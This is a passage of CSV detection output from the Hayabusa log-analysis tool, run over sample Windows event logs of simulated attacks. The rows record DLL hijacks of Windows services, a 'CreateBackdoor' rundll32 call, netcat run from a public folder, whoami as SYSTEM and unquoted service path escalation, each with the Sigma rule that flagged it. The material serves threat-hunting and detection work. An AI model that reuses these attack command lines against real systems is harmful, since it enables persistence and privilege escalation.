wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll 
Hijack.evtx -2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session 
Orchestrator Dll Hijack.evtx -2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : 
Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 
dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: 